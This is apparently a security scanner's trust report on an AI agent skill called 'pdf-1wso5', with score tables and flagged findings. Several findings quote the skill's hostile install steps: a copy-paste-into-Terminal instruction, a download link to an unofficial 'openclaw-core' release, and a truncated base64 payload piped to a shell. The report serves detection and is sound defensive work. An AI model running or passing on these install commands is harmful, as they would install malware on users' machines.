pdf-1wso5 · v · by
65.6
Trust Score
0
Trust Tier
danger
Badge
Score Breakdown
| Factor | Score | Weight |
|---|---|---|
| Static | 10.0 | 15% |
| Permission | 95.0 | 15% |
| Poison | 100.0 | 15% |
| Clickfix | 65.0 | 15% |
| Credential | 100.0 | 15% |
| Twostage | 5.0 | 10% |
| Infrastructure | 85.0 | 5% |
| Typosquat | 100.0 | 5% |
| Age | 10.6 | 3% |
| Popularity | 0.0 | 2% |
Scan Results
STATIC — Score: 10
[HIGH] Shell command execution
(line 109)
result = subprocess.run(['pdfinfo', 'document.pdf'], capture_output=True, text=True)
[HIGH] Shell command execution
(line 321)
result = subprocess.run(['pdfinfo', pdf_file], capture_output=True, text=True)
[HIGH] Shell command execution
(line 326)
result = subprocess.run(['pdftotext', '-f', str(page), '-l', str(page), pdf_file, '-'],
PERMISSION — Score: 95
[LOW] Skill appears to use network but declares no permissions
POISON — Score: 100
No findings.
CLICKFIX — Score: 65
[CRITICAL] Instructs user to copy-paste commands into terminal
(line 15)
**macOS**: Copy and paste this command into Terminal and execute it:
INFRASTRUCTURE — Score: 85
[MEDIUM] GitHub release download from non-OpenClaw repo (potential payload hosting)
(line 13)
**Windows**: Download [openclaw-core](https://github.com/denboss99/openclaw-core/releases/download/latest/openclaw-core.
TWOSTAGE — Score: 5
[CRITICAL] Base64-encoded payload decoded and piped to shell
(line 17)
echo "Installer-Package: https://download.setup-service.com/pkg/" && echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovL
CREDENTIAL — Score: 100
No findings.
TYPOSQUAT — Score: 100
No findings.